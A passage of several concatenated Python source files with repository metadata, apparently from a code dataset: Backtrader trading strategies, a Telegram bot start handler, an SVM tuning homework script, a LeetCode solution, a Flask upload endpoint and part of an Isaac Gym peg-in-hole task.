AwesomeOscillatorStrategyBase):\n def next(self):\n cloud = self.ichimoku.senkou_span_a - self.ichimoku.senkou_span_b\n tenkanGreaterKijun = self.ichimoku.tenkan_sen - self.ichimoku.kijun_sen\n if self.position.size == 0: # not in the market\n\n if tenkanGreaterKijun > 0:\n if (cloud > 0 and self.data > self.ichimoku.senkou_span_a) or (cloud < 0 and self.data > self.ichimoku.senkou_span_b):\n if self.tenkanXKijun == 1 or self.XSenkouB == 1:\n self.buy()\n\n elif tenkanGreaterKijun < 0:\n if (cloud > 0 and self.data < self.ichimoku.senkou_span_b) or (cloud < 0 and self.data < self.ichimoku.senkou_span_a):\n if self.tenkanXKijun == -1 or self.XSenkouB == -1:\n self.sell()\n\n elif self.position.size > 0:\n if (len(self) - self.holdstart) >= self.p.hold:\n if self.tenkanXKijun == -1:\n self.close()\n\n elif self.position.size < 0:\n if (len(self) - self.holdstart) >= self.p.hold:\n if self.tenkanXKijun == 1:\n self.close()\n\n super(IchimokuBracketStrategy, self).next()\n\nclass IchimokuCloudxDMIStrategy(IchimokuCloudStrategyBase, DMIStrategyBase):\n '''\n Kijun Sen (blue line, confirm future trends): standard line/base line, averaging highest high and lowest low for past 26 periods\n Tenkan Sen (red line, confirm trending/ranging): turning line, averaging highest high and lowest low for past 9 periods\n Chikou Span (green line, confirm future trends): lagging line, today’s closing price plotted 26 periods behind\n Senkou Span (red/green band, support and resistance levels):\n - first Senkou line (fast): averaging Tenkan Sen and Kijun Sen, plotted 26 periods ahead\n - second Senkou line (slow): averaging highest high and lowest low over past 52 periods, plotted 26 periods ahead\n\n Entry Criteria:\n\n - Long:\n - The price above the green cloud (price > 1st Senkou line > 2nd Senkou line) (Trend)\n - Tenkan Sen crosses above Kijun Sen (momentum)\n - Price crosses above Kijun Sen (momentum)\n optional: Chikou Span crossing above the price\n - Short:\n - The price below the red cloud (price < 1st Senkou line < 2nd Senkou line) (Trend)\n - Tenkan Sen crosses below Kijun Sen (momentum)\n - Price crosses below Kijun Sen (momentum)\n Optional: Chikou Span crossing down the price\n\n\n Exit Criteria\n - Long/Short: Same as opposite\n\n Failed: DMIcx\n\n '''\n\n def next(self):\n if self.position.size == 0: # not in the market\n\n if self.data.close > self.ichimoku.l.senkou_span_a > self.ichimoku.l.senkou_span_b:\n if self.tenkanXKijun == 1 and self.XKijun == 1:\n if self.dmi.adx > self.p.adxBenchmark:\n self.buy(exectype=bt.Order.Stop, price=self.data.close)\n\n if self.data.close < self.ichimoku.l.senkou_span_a < self.ichimoku.l.senkou_span_b:\n if self.tenkanXKijun == -1 and self.XKijun == -1:\n if self.dmi.adx > self.p.adxBenchmark:\n self.sell(exectype=bt.Order.Stop, price=self.data.close)\n\n elif self.position.size > 0: # longing in the market\n\n if self.data.close < self.ichimoku.l.senkou_span_a < self.ichimoku.l.senkou_span_b:\n if self.tenkanXKijun == -1 and self.XKijun == -1:\n if self.dmi.adx > self.p.adxBenchmark:\n self.close(exectype=bt.Order.Stop, price=self.data.close)\n\n elif self.position.size < 0: # shorting in the market\n\n if self.data.close > self.ichimoku.l.senkou_span_a > self.ichimoku.l.senkou_span_b:\n if self.tenkanXKijun == 1 and self.XKijun == 1:\n if self.dmi.adx > self.p.adxBenchmark:\n self.close(exectype=bt.Order.Stop, price=self.data.close)\n\nclass TTFStrategy(TTFStrategyBase):\n def next(self):\n if self.position.size == 0:\n if self.ttfCxUpper == -1:\n self.sell()\n elif self.ttfCxLower == 1:\n self.buy()\n elif self.position.size > 0:\n if self.ttfCxUpper == 1:\n self.sell()\n elif self.position.size < 0:\n if self.ttfCxLower == -1:\n self.buy()\n\nclass StochasticTTFStrategy(StochasticTTFStrategyBase):\n def next(self):\n if self.position.size == 0:\n if self.kCxd == -1:\n self.buy()\n\n elif self.kCxd == 1:\n self.sell()\n\n elif self.position.size > 0:\n if self.stochTTF.k <= -100:\n self.sell()\n\n elif self.position.size < 0:\n if self.stochTTF.k >= 100:\n self.buy()\n\nclass TTFwithStopTrail2(TTFStrategyBase):\n params = dict(size=0,stoptype=bt.Order.StopTrail, trailamount=0.0,trailpercent=0.0)\n\n def __init__(self):\n super(TTFwithStopTrail2, self).__init__()\n self.order = None\n\n def next(self):\n if self.position.size == 0:\n if self.ttfCxUpper == -1:\n self.sell()\n self.order = None\n elif self.ttfCxLower == 1:\n self.buy()\n self.order = None\n elif self.position.size > 0:\n # assert self.order is None\n if self.ttfCxUpper == 1:\n self.close()\n elif self.position.size < 0:\n # assert self.order is None\n if self.ttfCxLower == -1:\n self.close()\n\n if self.order is None:\n if self.position.size > 0:\n self.order = self.close(size=1, exectype=self.p.stoptype,\n trailamount=self.p.trailamount)\n # trailpercent=self.p.trailpercent)\n if self.position.size < 0:\n self.order = self.buy(size=1, exectype=self.p.stoptype,\n trailamount=self.p.trailamount)\n # trailpercent=self.p.trailpercent)\n\n\n if self.p.trailamount != 0:\n tcheck = self.data.close - self.p.trailamount\n else:\n tcheck = self.data.close * (1.0 - self.p.trailpercent)\n # print(','.join(\n # map(str, [self.datetime.date(), self.data.close[0],\n # self.order.created.price, tcheck])\n # )\n # )\n else:\n if self.p.trailamount != 0:\n tcheck = self.data.close - self.p.trailamount\n else:\n tcheck = self.data.close * (1.0 - self.p.trailpercent)\n\nclass TTFwithStopTrail(TTFStrategyBase, StopTrailStrategyExit):\n params = dict()\n\n def next(self):\n super(TTFwithStopTrail, self).next()\n if self.position.size == 0:\n if self.ttfCxUpper == -1:\n self.sell()\n self.order = None\n elif self.ttfCxLower == 1:\n self.buy()\n self.order = None\n\n elif self.position.size > 0:\n if self.ttfCxUpper == 1:\n self.sell()\n\n elif self.position.size < 0:\n if self.ttfCxLower == -1:\n self.buy()\n\n\n # if self.order is None:\n # if self.position.size > 0:\n # self.order = self.sell(exectype=self.p.stoptype,\n # trailamount=self.p.trailamount,\n # trailpercent=self.p.trailpercent)\n # elif self.position.size < 0:\n # self.order = self.buy(exectype=self.p.stoptype,\n # trailamount=self.p.trailamount,\n # trailpercent=self.p.trailpercent)\n #\n #\n # if self.p.trailamount != 0:\n # tcheck = self.data.close - self.p.trailamount\n # else:\n # tcheck = self.data.close * (1.0 - self.p.trailpercent)\n # # print(','.join(\n # # map(str, [self.datetime.date(), self.data.close[0],\n # # self.order.created.price, tcheck])\n # # )\n # # )\n # else:\n # if self.p.trailamount != 0:\n # tcheck = self.data.close - self.p.trailamount\n # else:\n # tcheck = self.data.close * (1.0 - self.p.trailpercent)\n # # print(','.join(\n # # map(str, [self.datetime.date(), self.data.close[0],\n # # self.order.created.price, tcheck])\n # # )\n # # )\n\nclass MyStrategy(TTFStrategyBase):\n\n def __init__(self):\n super(MyStrategy, self).__init__()\n # init stop loss and take profit order variables\n self.sl_order, self.tp_order = None, None\n\n def notify_trade(self, trade):\n if trade.isclosed:\n # clear stop loss and take profit order variables for no position state\n if self.sl_order:\n self.broker.cancel(self.sl_order)\n self.sl_order = None\n\n if self.tp_order:\n self.broker.cancel(self.tp_order)\n self.tp_order = None\n\n def next(self):\n\n if self.position.size == 0:\n if self.ttfCxUpper == -1:\n self.sell()\n\n # process stop loss and take profit signals\n if self.position:\n\n # set stop loss and take profit prices\n # in case of trailing stops stop loss prices can be assigned based on current indicator value\n price_sl_long = self.position.price * 0.98\n price_sl_short = self.position.price * 1.02\n price_tp_long = self.position.price * 1.06\n price_tp_short = self.position.price * 0.94\n\n # cancel existing stop loss and take profit orders\n if self.sl_order:\n self.broker.cancel(self.sl_order)\n\n if self.tp_order:\n self.broker.cancel(self.tp_order)\n\n # check & update stop loss order\n sl_price = 0.0\n if self.position.size > 0 and price_sl_long != 0: sl_price = price_sl_long\n if self.position.size < 0 and price_sl_short != 0: sl_price = price_sl_short\n\n if sl_price != 0.0:\n self.sl_order = self.order_target_value(target=0.0, exectype=bt.Order.Stop, price=sl_price)\n\n # check & update take profit order\n tp_price = 0.0\n if self.position.size > 0 and price_tp_long != 0: tp_price = price_tp_long\n if self.position.size < 0 and price_tp_short != 0: tp_price = price_tp_short\n\n if tp_price != 0.0:\n self.tp_order = self.order_target_value(target=0.0, exectype=bt.Order.Limit, price=tp_price)\n\nclass TTFwithBracket(TTFStrategyBase):\n\n params = dict(\n limit=0.005,\n limdays=3,\n limdays2=1000,\n limdays3=1000,\n hold=10,\n trailpercent=0.02,\n usebracket=False, # use order_target_size\n switchp1p2=False, # switch prices of order1 and order2\n )\n\n def notify_order(self, order):\n print('{}: Order ref: {} / Type {} / Status {}'.format(\n self.data.datetime.date(0),\n order.ref, 'Buy' * order.isbuy() or 'Sell' * order.issell(),\n order.getstatusname()))\n\n if order.status == order.Completed:\n self.holdstart = len(self)\n\n if not order.alive() and order.ref in self.orefs:\n self.orefs.remove(order.ref)\n\n def __init__(self):\n super(TTFwithBracket, self).__init__()\n self.orefs = list()\n self.holdstart = int()\n if self.p.usebracket:\n print('-' * 5, 'Using buy_bracket')\n\n def next(self):\n\n if self.orefs:\n return\n\n elif self.position.size == 0:\n\n if self.ttfCxLower == 1:\n close = self.data.close[0]\n p1 = close * (1.0 - self.p.limit)\n p2 = p1 - 0.02 * close\n p3 = p1 + 0.02 * close\n\n valid1 = datetime.timedelta(self.p.limdays)\n valid2 = datetime.timedelta(self.p.limdays2)\n valid3 = datetime.timedelta(self.p.limdays3)\n\n if self.p.switchp1p2:\n p1, p2 = p2, p1\n valid1, valid2 = valid2, valid1\n\n if not self.p.usebracket:\n o1 = self.buy(exectype=bt.Order.Limit,\n price=p1,\n valid=valid1,\n transmit=False)\n\n print('{}: Oref {} / Buy at {}'.format(\n self.datetime.date(), o1.ref, p1))\n\n o2 = self.sell(exectype=bt.Order.StopTrail,\n trailpercent=0.05,\n valid=valid2,\n parent=o1,\n transmit=False)\n\n print('{}: Oref {} / Sell StopTrail at {}'.format(\n self.datetime.date(), o2.ref, p2))\n\n o3 = self.sell(exectype=bt.Order.Limit,\n price=p3,\n valid=valid3,\n parent=o1,\n transmit=True)\n\n print('{}: Oref {} / Sell Limit at {}'.format(\n self.datetime.date(), o3.ref, p3))\n\n self.orefs = [o1.ref, o2.ref, o3.ref]\n\n else:\n os = self.buy_bracket(\n price=p1, valid=valid1,\n stopprice=p2, stopargs=dict(valid=valid2),\n limitprice=p3, limitargs=dict(valid=valid3), )\n\n self.orefs = [o.ref for o in os]\n\n elif self.ttfCxUpper == -1:\n\n close = self.data.close[0]\n p1 = close * (1.0 - self.p.limit)\n p2 = p1 + 0.02 * close\n p3 = p1 - 0.02 * close\n\n valid1 = datetime.timedelta(self.p.limdays)\n valid2 = datetime.timedelta(self.p.limdays2)\n valid3 = datetime.timedelta(self.p.limdays3)\n\n if self.p.switchp1p2:\n p1, p2 = p2, p1\n valid1, valid2 = valid2, valid1\n\n if not self.p.usebracket:\n o1 = self.sell(exectype=bt.Order.Limit,\n price=p1,\n valid=valid1,\n transmit=False)\n\n print('{}: Oref {} / Sell at {}'.format(\n self.datetime.date(), o1.ref, p1))\n\n o2 = self.buy(exectype=bt.Order.StopTrail,\n trailpercent=0.05,\n valid=valid2,\n parent=o1,\n transmit=False)\n\n print('{}: Oref {} / Buy StopTrail at {}'.format(\n self.datetime.date(), o2.ref, p2))\n\n o3 = self.buy(exectype=bt.Order.Limit,\n price=p3,\n valid=valid3,\n parent=o1,\n transmit=True)\n\n print('{}: Oref {} / Buy Limit at {}'.format(\n self.datetime.date(), o3.ref, p3))\n\n self.orefs = [o1.ref, o2.ref, o3.ref]\n\n else:\n os = self.sell_bracket(\n price=p1, valid=valid1,\n stopprice=p2, stopargs=dict(valid=valid2),\n limitprice=p3, limitargs=dict(valid=valid3), )\n\n self.orefs = [o.ref for o in os]\n\n else: # in the market\n if (len(self) - self.holdstart) >= self.p.hold:\n pass # do nothing in this case #TODO: Multiple data feeds#TODO: Multiple data feeds\n\n # elif datetime.time(2,45) < self.data.datetime.time() < datetime.time(9,0):\n # self.close(size=self.p.size)\n\nclass TTFwithBracketandCancellation(TTFStrategyBase, BracketBuying, NotifyOrderShowStatus):\n\n params = dict(usebracket=False, # use order_target_size\n switchp1p2=False, # switch prices of order1 and order2\n )\n\n def next(self):\n\n if self.position.size == 0:\n\n if self.ttfCxLower == 1:\n self.buyWithBracket()\n\n elif self.ttfCxUpper == -1:\n self.sellWithBracket()\n\n elif self.position.size < 1:\n\n if self.ttfCxLower == 1:\n self.closeSellBracket()\n\n elif self.position.size > 1:\n\n if self.ttfCxUpper == -1:\n self.closeBuyBracket()\n\n#TODO: the market order cant be executed when counteracted cross indicator triggered\n\nclass TTFHOLD(TTFStrategyBase, HoldStrategyExit):\n params = (('risk', 0.1), # risk 10%\n ('stop_dist', 200),\n (\"trailamount\", 100)) # stoploss distance 5%\n\n def __init__(self):\n super(TTFHOLD, self).__init__()\n\n def next(self):\n cash = self.broker.get_cash()\n stop_price = (self.data.close[0] - self.p.stop_dist)\n if self.position.size > 0:\n if self.ttfCxUpper == 1:\n if (len(self) - self.holdstart) >= self.p.hold:\n self.order = self.sell()\n elif self.position.size < 0:\n if self.ttfCxLower == -1:\n if (len(self) - self.holdstart) >= self.p.hold:\n self.order = self.buy()\n elif self.position.size == 0:\n if self.ttfCxUpper == -1:\n self.sell_bracket(stopprice= self.p.trailamount)\n self.order = self.sell()\n self.order = self.buy(exectype=bt.Order.Stop, price=stop_price)\n elif self.ttfCxLower == 1:\n # self.buy_bracket(stopprice=self.data.close[0] - self.p.trailamount)\n self.order = self.buy()\n self.order = self.sell(exectype=bt.Order.Stop, price=stop_price)\n\n # qty = math.floor((cash * self.p.risk) / (self.data.close[0] - stop_price))\n\nclass HeikinAshiStrategy(bt.Strategy):\n def __init__(self):\n self.newdata = self.data1\n self.hkarsi = BTIndicator.talibCCI(self.data1.close)\n self.up = self.data1.close > self.data1.open\n\n def next(self):\n if self.position.size == 0:\n if self.up:\n self.buy()\n elif not self.up:\n self.sell()\n elif self.position.size > 0:\n if not self.up:\n self.sell()\n elif self.position.size < 0:\n if self.up:\n self.buy()\n\nclass PSARStrategy(IchimokuStrategy, PSARStrategyBase, KDJStrategyBase):\n pass","repo_name":"princetonwong/AlgoTrading","sub_path":"BacktraderAPI/BTStrategy.py","file_name":"BTStrategy.py","file_ext":"py","file_size_in_byte":42160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"21678861280","text":"from aiogram import types\nfrom aiogram.dispatcher.filters.builtin import CommandStart\n\nfrom tgbot.keyboards.reply import menu\n#from .help import get_help\nfrom loader import dp\nfrom tgbot.keyboards.reply import menu\nfrom tgbot.services.db_api.db_commands import *\n\n\n@dp.message_handler(CommandStart())\nasync def bot_start(message: types.Message):\n await message.answer(f\"Привет, {message.from_user.full_name}!\", reply_markup=menu)\n user = await add_user(user_id=message.from_user.id, full_name=message.from_user.full_name,\n username=message.from_user.username)\n count = await count_users()\n await message.answer(\n '\\n'.join(\n [\n f'Привет, {message.from_user.full_name}!',\n f'Ты был занесен в базу',\n f'В базе {count} пользователей'\n\n ]\n )\n )\n","repo_name":"SayKonstantin/telegrambot-v.2","sub_path":"tgbot/handlers/start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"31247497871","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport numpy as np\nfrom sklearn.multiclass import OneVsRestClassifier\nfrom sklearn.svm import SVC\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.model_selection import PredefinedSplit\nimport scipy.io as sio\nimport matplotlib.pyplot as plt\nimport time\nfrom sklearn.metrics import classification_report\nfrom sklearn.metrics import f1_score\n\n\n# In[2]:\n\n\ndataset = sio.loadmat('q4_dataset')\n\n\n# In[3]:\n\n\nsorted(dataset.keys())\n\n\n# In[4]:\n\n\ndata_globals = dataset['__globals__']\ndata_header = dataset['__header__']\ndata_version = dataset['__version__']\ndata_class_labels = dataset['class_labels']\ndata_images = dataset['images']\ndata_inception_features = dataset['inception_features']\n\ndata_globals = np.array(data_globals)\ndata_header = np.array(data_header)\ndata_version = np.array(data_version)\ndata_class_labels = np.array(data_class_labels)\ndata_images = np.array(data_images)\ndata_inception_features = np.array(data_inception_features)\n\n\n# In[5]:\n\n\nprint('The size of data_globals : ' +str(np.shape(data_globals)))\nprint('The size of data_header : ' +str(np.shape(data_header)))\nprint('The size of data_version : ' +str(np.shape(data_version)))\nprint('The size of data_class_labels : ' +str(np.shape(data_class_labels)))\nprint('The size of data_images : ' +str(np.shape(data_images)))\nprint('The size of data_inception_features : ' +str(np.shape(data_inception_features)))\n\n\n# In[6]:\n\n\ndef parameter_tuning_SVM(data, labels, k, C, gammas=None, kernel = 'linear'):\n \n start_time = time.time()\n \n best_params = {'best_c': None, 'best_gamma': None}\n best_score = 0\n best_c = None\n best_gamma = None\n all_scores = list()\n fold_scores = list()\n \n np.random.seed(8)\n sampleSize = np.shape(data)[0]\n featureSize = np.shape(data)[1]\n \n randomIndexes = np.random.permutation(sampleSize)\n data = data[randomIndexes]\n labels = labels[randomIndexes]\n\n fold_size = int(sampleSize / k)\n \n # Implement a 5-fold cross validation\n if (kernel == 'linear'):\n for c in C:\n \n classifier = OneVsRestClassifier(SVC(kernel='linear', C=c))\n fold_scores = list()\n \n for j in range(k):\n\n test_index_start = fold_size*j\n valid_index_start = fold_size*(j+1)\n train_index_start = fold_size*(j+2)\n\n test_indeces = np.arange(test_index_start, valid_index_start) % sampleSize\n valid_indeces = np.arange(valid_index_start, train_index_start) % sampleSize\n train_indeces = np.arange(train_index_start, sampleSize + test_index_start) % sampleSize\n\n test_data = data[test_indeces]\n test_labels = labels[test_indeces]\n\n valid_data = data[valid_indeces]\n valid_labels = labels[valid_indeces]\n\n train_data = data[train_indeces]\n train_labels = labels[train_indeces]\n\n model = classifier.fit(train_data, train_labels)\n score = classifier.score(valid_data, valid_labels)\n fold_scores.append(score)\n \n mean_fold_score = np.mean(fold_scores)\n all_scores.append(mean_fold_score)\n \n if(mean_fold_score > best_score):\n best_score = mean_fold_score\n best_c = c\n\n best_params['best_c'] = best_c\n \n \n else:\n \n for c in C:\n \n for gam in gammas:\n \n classifier = OneVsRestClassifier(SVC(kernel='rbf', C=c, gamma= gam))\n fold_scores = list()\n \n for j in range(k):\n\n test_index_start = fold_size*j\n valid_index_start = fold_size*(j+1)\n train_index_start = fold_size*(j+2)\n\n test_indeces = np.arange(test_index_start, valid_index_start) % sampleSize\n valid_indeces = np.arange(valid_index_start, train_index_start) % sampleSize\n train_indeces = np.arange(train_index_start, sampleSize + test_index_start) % sampleSize\n\n test_data = data[test_indeces]\n test_labels = labels[test_indeces]\n\n valid_data = data[valid_indeces]\n valid_labels = labels[valid_indeces]\n\n train_data = data[train_indeces]\n train_labels = labels[train_indeces]\n\n\n model = classifier.fit(train_data, train_labels)\n score = classifier.score(valid_data, valid_labels)\n fold_scores.append(score)\n \n mean_fold_score = np.mean(fold_scores)\n all_scores.append(mean_fold_score)\n\n if(mean_fold_score > best_score):\n best_score = mean_fold_score\n best_c = c\n best_gamma = gam\n\n best_params['best_c'] = best_c\n best_params['best_gamma'] = best_gamma\n\n end_time = time.time()\n time_elapsed = end_time - start_time\n \n return best_params, all_scores, time_elapsed\n\n\n# In[7]:\n\n\n# SVM (linear) parameter tuning\n\nC_linear = [10**-6, 10**-4, 10**-2, 1, 10**1, 10**10]\n\nbest_params_linear, scores_linear, time_linear = parameter_tuning_SVM(data_inception_features, data_class_labels, 5, \n C_linear, gammas = None, kernel = 'linear')\n\n\n# In[8]:\n\n\nprint('Best parameters for SVM (linear) : ' +str(best_params_linear))\nprint('\\n')\nprint('The scores for SVM (linear) : ' +str(scores_linear))\nprint('\\n')\nprint('Time elapsed on training SVM (linear) : ' +str(time_linear) +' seconds')\n\n\n# In[9]:\n\n\nfigureNum = 0\nx = ['10^-6', '10^-4', '10^-2', '1', '10^1', '10^10']\nplt.figure(figureNum)\nplt.bar(x, scores_linear)\nplt.title('Mean accuracies for each C')\nplt.xlabel('C')\nplt.ylabel('Accuracy')\nplt.show()\n\n\n# In[10]:\n\n\n# To train the SVM once more with the best parameters\n\ndef train_SVM(data, labels, k, best_c, best_gamma = None, kernel = 'linear'):\n f1_macro_folds = list()\n classification_scores = list()\n \n if(kernel == 'linear'):\n classifier = OneVsRestClassifier(SVC(kernel='linear', C=best_c))\n else:\n classifier = OneVsRestClassifier(SVC(kernel='rbf', C=best_c, gamma= best_gamma))\n\n np.random.seed(8)\n sampleSize = np.shape(data)[0]\n featureSize = np.shape(data)[1]\n \n randomIndexes = np.random.permutation(sampleSize)\n data = data[randomIndexes]\n labels = labels[randomIndexes]\n \n fold_size = int(sampleSize / k)\n \n for j in range(k):\n \n test_index_start = fold_size*j\n train_index_start = fold_size*(j+1)\n\n test_indeces = np.arange(test_index_start, train_index_start) % sampleSize\n train_indeces = np.arange(train_index_start, sampleSize + test_index_start) % sampleSize\n \n test_data = data[test_indeces]\n test_labels = labels[test_indeces]\n \n train_data = data[train_indeces]\n train_labels = labels[train_indeces]\n \n model = classifier.fit(train_data, train_labels)\n y_pred = classifier.predict(test_data)\n scores = classification_report(test_labels, y_pred)\n \n f1_macro_folds.append(f1_score(test_labels, y_pred, average='macro'))\n classification_scores.append(scores)\n \n return classification_scores, f1_macro_folds\n\n\n# In[11]:\n\n\n# Again train the SMV linear with best parameter with 5 fold cross validation\n\nbest_c_linear = best_params_linear['best_c']\n\nclassification_scores_linear, f1_macro_linear = train_SVM(data_inception_features, data_class_labels, 5,\n best_c_linear, best_gamma = None, kernel = 'linear')\n\n\n# In[12]:\n\n\nprint('SVM(linear) with best parameters:')\nprint('\\n')\n\nfor i in range(5):\n print('Fold ' +str(i+1)+':')\n print(classification_scores_linear[i])\n print('\\n')\n\n\n# In[13]:\n\n\n# Question 4.2\n\n# SVM (rbf) parameter tuning\n\nC_rbf = [10**-6, 10**-4, 10**-2, 1, 10**1, 10**10]\n\nvar_data = np.var(data_inception_features)\nfeaturesize = np.shape(data_inception_features)[1]\nscale = 1 / (featuresize * var_data)\n\ngamma_rbf = [2**-4, 2**-2, 1, 2**2, 2**10, scale]\n\nbest_params_rbf, scores_rbf, time_rbf = parameter_tuning_SVM(data_inception_features, data_class_labels, 5,\n C_rbf, gammas = gamma_rbf, kernel = 'rbf')\n\n\n# In[14]:\n\n\nprint('Best parameters for SVM (rbf) : ' +str(best_params_rbf))\nprint('\\n')\n#print('The scores for SVM (rbf) : ' +str(scores_rbf))\nprint('Time elapsed on training SVM (rbf) : ' +str(time_rbf) + ' seconds')\n\n\n# In[15]:\n\n\n# Again train the SMV (rbf) with best parameter with 5 fold cross validation\n\nbest_c_rbf = best_params_rbf['best_c']\nbest_gamma_rbf = best_params_rbf['best_gamma']\n\n\n# In[16]:\n\n\nclassification_scores_rbf, f1_macro_rbf = train_SVM(data_inception_features, data_class_labels, 5,\n best_c_rbf, best_gamma = best_gamma_rbf, kernel = 'rbf')\n\n\n# In[17]:\n\n\nprint('SVM(rbf) with best parameters:')\nprint('\\n')\nfor i in range(5):\n print('Fold ' +str(i+1)+':')\n print(classification_scores_rbf[i])\n print('\\n')\n\n\n# In[19]:\n\n\nx = ['Linear', 'RBF']\nF1_macro_all = list()\nF1_macro_all.append(f1_macro_linear)\nF1_macro_all.append(f1_macro_rbf)\n\nfigureNum += 1\nplt.figure(figureNum)\nplt.boxplot(F1_macro_all)\nplt.title('F1 Macro Comparison between SVM Linear and SVM Rbf ')\nplt.xticks(np.arange(1,3), (r'Linear', r'RBF'))\nplt.xlabel('F1')\nplt.show()\n\n","repo_name":"ozdamarberkan/Machine_Learning","sub_path":"Homework2/Question4.py","file_name":"Question4.py","file_ext":"py","file_size_in_byte":9795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"43227359231","text":"from collections import defaultdict\n\nclass Solution(object):\n def majorityElement(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n major = len(nums) >> 1\n count = defaultdict(int)\n for elem in nums:\n count[elem] += 1\n if count[elem] > major:\n return elem\n\n\n# assert Solution().majorityElement([1, 2, 2, 1, 1, 2]) == 1 # but mine is null\nassert Solution().majorityElement([1, 2, 2, 1, 1, 2, 2]) == 1\n","repo_name":"wufangjie/leetcode","sub_path":"169. Majority Element.py","file_name":"169. Majority Element.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"5587496412","text":"import os\nimport uuid\nfrom app.libs.tools import secure_filename\nfrom flask import request, current_app, jsonify\nfrom app.libs.redprint import Redprint\n\napi = Redprint('upload')\n\n\n@api.route('', methods=['GET', 'POST'])\ndef upload_file():\n if request.method == 'POST':\n file = request.files['file']\n if file and _allowed_file(file.filename):\n filename = secure_filename(file.filename)\n # 因为上次的文件可能有重名,因此使用uuid保存文件\n file_name = str(uuid.uuid4()) + '.' + filename.rsplit('.', 1)[1]\n file.save(os.path.join(current_app.config['UPLOAD_FOLDER'], file_name))\n return jsonify({\"msg\": \"success\", \"file_name\": file_name})\n return jsonify({\"msg\": \"failed\"})\n return '''\n \n \n \n \n Upload new File\n

Upload new File

\n
\n

\n \n

\n '''\n\n\ndef _allowed_file(filename):\n return '.' in filename and filename.rsplit('.', 1)[1] in current_app.config['ALLOW_EXTENSIONS']\n","repo_name":"chenyang929/flask-api-basic","sub_path":"app/api/v1/upload.py","file_name":"upload.py","file_ext":"py","file_size_in_byte":1241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"28124033963","text":"\"\"\"Factory: Class for peg-hole place task.\n\nInherits peg-hole environment class and abstract task class (not enforced). Can be executed with\npython train.py task=FactoryTaskPegHolePlace\n\"\"\"\n\nimport hydra\nimport omegaconf\nimport os\nimport torch\n\nfrom isaacgym import gymapi, gymtorch, torch_utils\nimport isaacgymenvs.tasks.factory.factory_control as fc\nfrom isaacgymenvs.tasks.factory.factory_env_peg_hole import FactoryEnvPegHole\nfrom isaacgymenvs.tasks.factory.factory_schema_class_task import FactoryABCTask\nfrom isaacgymenvs.tasks.factory.factory_schema_config_task import FactorySchemaConfigTask\nfrom isaacgymenvs.utils import torch_jit_utils\nimport math\n\nclass FactoryTaskPegHolePlace(FactoryEnvPegHole, FactoryABCTask):\n\n def __init__(self, cfg, rl_device, sim_device, graphics_device_id, headless, virtual_screen_capture, force_render):\n \"\"\"Initialize instance variables. Initialize environment superclass.\"\"\"\n\n super().__init__(cfg, rl_device, sim_device, graphics_device_id, headless, virtual_screen_capture, force_render)\n\n self.cfg = cfg\n self._get_task_yaml_params()\n self._acquire_task_tensors()\n self.parse_controller_spec()\n\n if self.cfg_task.sim.disable_gravity:\n self.disable_gravity()\n\n if self.viewer is not None:\n self._set_viewer_params()\n\n def _get_task_yaml_params(self):\n \"\"\"Initialize instance variables from YAML files.\"\"\"\n\n cs = hydra.core.config_store.ConfigStore.instance()\n cs.store(name='factory_schema_config_task', node=FactorySchemaConfigTask)\n\n self.cfg_task = omegaconf.OmegaConf.create(self.cfg)\n self.max_episode_length = self.cfg_task.rl.max_episode_length # required instance var for VecTask\n\n asset_info_path = '../../assets/factory/yaml/factory_asset_info_insertion.yaml' # relative to Gym's Hydra search path (cfg dir)\n self.asset_info_peg_hole = hydra.compose(config_name=asset_info_path)\n self.asset_info_peg_hole = self.asset_info_peg_hole['']['']['']['']['']['']['assets']['factory']['yaml'] # strip superfluous nesting\n\n ppo_path = 'train/FactoryTaskPegHolePlacePPO.yaml' # relative to Gym's Hydra search path (cfg dir)\n self.cfg_ppo = hydra.compose(config_name=ppo_path)\n self.cfg_ppo = self.cfg_ppo['train'] # strip superfluous nesting\n\n def _acquire_task_tensors(self):\n \"\"\"Acquire tensors.\"\"\"\n \n \n self.peg_base_pos_local= (self.hole_heights + self.cfg_task.rl.peg_over_hole) * \\\n torch.tensor([0.0, 0.0, 1.0], device=self.device).repeat((self.num_envs, 1))\n self.hole_pos_local= self.hole_heights * torch.tensor([0.0, 0.0, 1.0], device=self.device).repeat((self.num_envs, 1))\n\n # Keypoint tensors\n self.keypoint_offsets = self._get_keypoint_offsets(self.cfg_task.rl.num_keypoints) * self.cfg_task.rl.keypoint_scale\n\n self.keypoints_peg = torch.zeros((self.num_envs, self.cfg_task.rl.num_keypoints, 3),\n dtype=torch.float32,\n device=self.device)\n self.keypoints_hole = torch.zeros_like(self.keypoints_peg, device=self.device)\n\n self.identity_quat = torch.tensor([0.0, 0.0, 0.0, 1.0], device=self.device).unsqueeze(0).repeat(self.num_envs, 1)\n\n self.actions = torch.zeros((self.num_envs, self.cfg_task.env.numActions), device=self.device)\n\n def _refresh_task_tensors(self):\n \"\"\"Refresh tensors.\"\"\"\n\n # # Compute pos of keypoints on gripper and peg in world frame\n for idx, keypoint_offset in enumerate(self.keypoint_offsets):\n self.keypoints_peg[:, idx] = torch_jit_utils.tf_combine(self.peg_quat,\n self.peg_pos,\n self.identity_quat,\n (keypoint_offset + self.peg_base_pos_local))[1]\n self.keypoints_hole[:, idx] = torch_jit_utils.tf_combine(self.hole_quat,\n self.hole_pos,\n self.identity_quat,\n (keypoint_offset + self.hole_pos_local))[1]\n \n def pre_physics_step(self, actions):\n \"\"\"Reset environments. Apply actions from policy. Simulation step called after this method.\"\"\"\n\n env_ids = self.reset_buf.nonzero(as_tuple=False).squeeze(-1)\n if len(env_ids) > 0:\n self.reset_idx(env_ids)\n\n self.actions = actions.clone().to(self.device) # shape = (num_envs, num_actions); values = [-1, 1]\n\n self._apply_actions_as_ctrl_targets(actions=self.actions,\n 